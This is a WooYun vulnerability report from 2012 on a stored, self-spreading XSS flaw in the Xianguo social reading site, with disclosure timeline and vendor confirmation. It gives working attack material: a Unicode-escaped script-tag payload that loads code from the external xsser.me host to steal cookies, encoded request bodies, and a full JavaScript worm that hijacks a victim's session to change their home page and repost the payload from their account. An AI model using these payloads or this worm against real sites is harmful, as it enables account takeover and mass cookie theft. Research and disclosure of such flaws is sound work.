
漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-012579

漏洞标题:鲜果网Xss,可蠕虫,理论上可对用户持久控制

相关厂商:鲜果网

漏洞作者: imlonghao

提交时间:2012-09-22 22:56

修复时间:2012-11-06 22:58

公开时间:2012-11-06 22:58

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:



漏洞详情

披露状态:

2012-09-22: 细节已通知厂商并且等待厂商处理中
2012-09-23: 厂商已经确认,细节仅向厂商公开
2012-10-03: 细节向核心白帽子及相关领域专家公开
2012-10-13: 细节向普通白帽子公开
2012-10-23: 细节向实习白帽子公开
2012-11-06: 细节向公众公开

简要描述:

发现大伙很喜欢欺负新来的厂商~~~
鲜果网Xss,可蠕虫,理论上可对用户持久控制

详细说明:

鲜果日志里面的分享视频和音乐中,可以通过插入一些跨站代码来实现XSS的效果,详见证明。
对用户进行持久控制,可以通过发一条含有跨站代码的日志,然后将鲜果社区设为我的鲜果首页,这样用户每登录一次鲜果就会触发一次跨站代码,一次又一次,一次又一次
演示地址:http://xianguo.com/1378148/

漏洞证明:

首先我们来到分享视频的地方,我们随便写一个视频,保存,截包。
在video这个参数里会发现一个神奇的东西:

%7B%22flashvar%22%3A%22OgYtHXq8oVw%22%2C%22flash%22%3A%22http%3A%2F%2Fwww.tudou.com%2Fv%2FOgYtHXq8oVw%2Fv.swf%22%2C%22imageurl%22%3A%22http%3A%2F%2Fi1.tdimg.com%2F118%2F195%2F384%2Fp.jpg'%20%2Clpic%20%3D%20%5C%22http%3A%2F%2Fi1.tdimg.com%2F118%2F195%2F384%2Fp.jpg%22%2C%22title%22%3A%22%E6%9D%A8%E5%B9%82%20%E5%88%98%E6%81%BA%E5%A8%81%20%E9%94%99%E6%80%AA%22%2C%22flag%22%3A1%2C%22url%22%3A%22http%3A%2F%2Fwww.tudou.com%2Fprograms%2Fview%2FOgYtHXq8oVw%22%7D


进行一下URIComponent解码

{"flashvar":"OgYtHXq8oVw","flash":"http://www.tudou.com/v/OgYtHXq8oVw/v.swf","imageurl":"http://i1.tdimg.com/118/195/384/p.jpg' ,lpic = \"http://i1.tdimg.com/118/195/384/p.jpg","title":"杨幂 刘恺威 错怪","flag":1,"url":"http://www.tudou.com/programs/view/OgYtHXq8oVw"}


看到了我们很熟悉的{}这种类型,弱弱的表示不懂的专业术语是什么.......
然后将我们的跨站代码进行Unicode编码
"><script src=http://xsser.me/pIQKKz></script>

\u0022\u003E\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003D\u0068\u0074\u0074\u0070\u003A\u002f\u002f\u0078\u0073\u0073\u0065\u0072\u002e\u006d\u0065\u002f\u0070\u0049\u0051\u004b\u004b\u007a\u003E\u003C\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003E


然后将上面的编码插入到flash地址中

{"flashvar":"OgYtHXq8oVw","flash":"http://www.tudou.com/v/OgYtHXq8oVw/v.swf\u0022\u003E\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003D\u0068\u0074\u0074\u0070\u003A\u002f\u002f\u0078\u0073\u0073\u0065\u0072\u002e\u006d\u0065\u002f\u0070\u0049\u0051\u004b\u004b\u007a\u003E\u003C\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003E","imageurl":"http://i1.tdimg.com/118/195/384/p.jpg' ,lpic = \"http://i1.tdimg.com/118/195/384/p.jpg","title":"杨幂 刘恺威 错怪","flag":1,"url":"http://www.tudou.com/programs/view/OgYtHXq8oVw"}


进行URIComponent编码

%7B%22flashvar%22%3A%22OgYtHXq8oVw%22%2C%22flash%22%3A%22http%3A%2F%2Fwww.tudou.com%2Fv%2FOgYtHXq8oVw%2Fv.swf%5Cu0022%5Cu003E%5Cu003C%5Cu0073%5Cu0063%5Cu0072%5Cu0069%5Cu0070%5Cu0074%5Cu0020%5Cu0073%5Cu0072%5Cu0063%5Cu003D%5Cu0068%5Cu0074%5Cu0074%5Cu0070%5Cu003A%5Cu002f%5Cu002f%5Cu0078%5Cu0073%5Cu0073%5Cu0065%5Cu0072%5Cu002e%5Cu006d%5Cu0065%5Cu002f%5Cu0070%5Cu0049%5Cu0051%5Cu004b%5Cu004b%5Cu007a%5Cu003E%5Cu003C%5Cu002f%5Cu0073%5Cu0063%5Cu0072%5Cu0069%5Cu0070%5Cu0074%5Cu003E%22%2C%22imageurl%22%3A%22http%3A%2F%2Fi1.tdimg.com%2F118%2F195%2F384%2Fp.jpg'%20%2Clpic%20%3D%20%5C%22http%3A%2F%2Fi1.tdimg.com%2F118%2F195%2F384%2Fp.jpg%22%2C%22title%22%3A%22%E6%9D%A8%E5%B9%82%20%E5%88%98%E6%81%BA%E5%A8%81%20%E9%94%99%E6%80%AA%22%2C%22flag%22%3A1%2C%22url%22%3A%22http%3A%2F%2Fwww.tudou.com%2Fprograms%2Fview%2FOgYtHXq8oVw%22%7D


然后替换掉原来video参数中的内容。


效果如下


COOKIES


其实拿到了COOKIES就可以登录了,但还是来说说持久控制。

// Payload script quoted in the report (presumably the file served from the
// xsser.me URL referenced by the injected <script src=...> tag above).
// Annotated for analysis only; the code itself is left unchanged.
//
// `pkav` is a minimal XMLHttpRequest wrapper. Because the script executes
// inside the xianguo.com origin, the browser attaches the victim's cookies to
// every request it makes, so the two POSTs below run with the victim's session.
var pkav={
// Returns an XHR object: the standard XMLHttpRequest first, then the two
// legacy ActiveX ProgIDs (old Internet Explorer). Returns false when none of
// the three constructors exists.
ajax:function(){
var xmlHttp;
try{
xmlHttp=new XMLHttpRequest();
}catch (e){
try{
xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");
}catch (e){
try{
xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
}
catch (e){
return false;
}
}
}
return xmlHttp;
},
// Issues an asynchronous request.
//   url      - target; when falsy nothing is sent and nothing is returned
//   data     - string, or a plain object serialised as k=v&k=v (values only
//              are run through encodeURIComponent; keys are not)
//   method   - upper-cased, defaults to "GET"
//   callback - invoked with responseText only on readyState 4 / status 200;
//              every other outcome (network error, non-200, the false return
//              from ajax()) is dropped silently
req:function(url,data,method,callback){
method=(method||"").toUpperCase();
method=method||"GET";
data=data||"";
if(url){
var a=this.ajax();
a.open(method,url,true);
// Form encoding is only set for POST; the body below is built in that shape.
if(method=="POST"){
a.setRequestHeader("Content-type","application/x-www-form-urlencoded");
}
a.onreadystatechange=function(){
if (a.readyState==4 && a.status==200)
{
if(callback){
callback(a.responseText);
}
}
};
if((typeof data)=="object"){
var arr=[];
// for...in also walks inherited enumerable properties of data.
for(var i in data){
arr.push(i+"="+encodeURIComponent(data[i]));
}
a.send(arr.join("&"));
}else{
// data was defaulted to "" above, so an empty body is sent as null.
a.send(data||null);
}
}
},
// Convenience wrappers around req().
get:function(url,callback){
this.req(url,"","GET",callback);
},
post:function(url,data,callback){
this.req(url,data,"POST",callback);
}
};
// Run-once guard: window.__x is set after the first execution so the payload
// fires only once per page load. From a defender's side this global is a
// simple indicator that the script has already run in the page.
if(!window.__x){
// Request 1 (per the report): set the community page as the victim's home
// page, so the infected entry is shown on every subsequent login.
pkav.post("http://xianguo.com/doings/sethome","type=snsSet",function(rs){});
// Request 2 (per the report): publish a new entry from the victim's account.
// Its video parameter is the same double-URL-encoded JSON shown earlier, with
// the \u-escaped <script> tag inside the flash URL — this is the
// self-propagating step. For detection, POSTs to /doings/addblog whose video
// field carries %255Cu sequences or the xsser.me host are the signal to look
// for in request logs.
pkav.post("http://xianguo.com/doings/addblog","videoKeyword=&tag-input=%E6%B7%BB%E5%8A%A0%E6%A0%87%E7%AD%BE%EF%BC%8C%E7%94%A8%E9%80%97%E5%8F%B7%E6%88%96%E5%9B%9E%E8%BD%A6%E5%88%86%E9%9A%94&tags=%255B%255D&video=%257B%2522flashvar%2522%253A%2522OgYtHXq8oVw%2522%252C%2522flash%2522%253A%2522http%253A%252F%252Fwww.tudou.com%252Fv%252FOgYtHXq8oVw%252Fv.swf%255Cu0022%255Cu003E%255Cu003C%255Cu0073%255Cu0063%255Cu0072%255Cu0069%255Cu0070%255Cu0074%255Cu0020%255Cu0073%255Cu0072%255Cu0063%255Cu003D%255Cu0068%255Cu0074%255Cu0074%255Cu0070%255Cu003A%255Cu002f%255Cu002f%255Cu0078%255Cu0073%255Cu0073%255Cu0065%255Cu0072%255Cu002e%255Cu006d%255Cu0065%255Cu002f%255Cu0070%255Cu0049%255Cu0051%255Cu004b%255Cu004b%255Cu007a%255Cu003E%255Cu003C%255Cu002f%255Cu0073%255Cu0063%255Cu0072%255Cu0069%255Cu0070%255Cu0074%255Cu003E%2522%252C%2522imageurl%2522%253A%2522http%253A%252F%252Fi1.tdimg.com%252F118%252F195%252F384%252Fp.jpg'%2520%252Clpic%2520%253D%2520%255C%2522http%253A%252F%252Fi1.tdimg.com%252F118%252F195%252F384%252Fp.jpg%2522%252C%2522title%2522%253A%2522%25E6%259D%25A8%25E5%25B9%2582%2520%25E5%2588%2598%25E6%2581%25BA%25E5%25A8%2581%2520%25E9%2594%2599%25E6%2580%25AA%2522%252C%2522flag%2522%253A1%252C%2522url%2522%253A%2522http%253A%252F%252Fwww.tudou.com%252Fprograms%252Fview%252FOgYtHXq8oVw%2522%257D&editorValue=%3Cp%3E%E9%BB%84%E9%87%91%E5%91%A8%E5%85%A8%E5%9B%BD80%E6%99%AF%E7%82%B9%E4%B8%8B%E8%B0%83%E7%A5%A8%E4%BB%B7%3C%2Fp%3E",function(rs){});
window.__x=1;
}


第一个包是设置互动社区为首页
第二个包是发送一条微博

修复方案:

加强过滤~~~~~~~~~(对video参数中的内容在输出到页面时做HTML转义,而不只是对输入做字符过滤——上面用\u编码就绕过了输入过滤)
时间不足,不多打字了。。。

版权声明:转载请注明来源 imlonghao@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2012-09-23 00:21

厂商回复:

非常感谢@imlonghao,我们已经安排跟进尽快修复。再次感谢。

最新状态:

暂无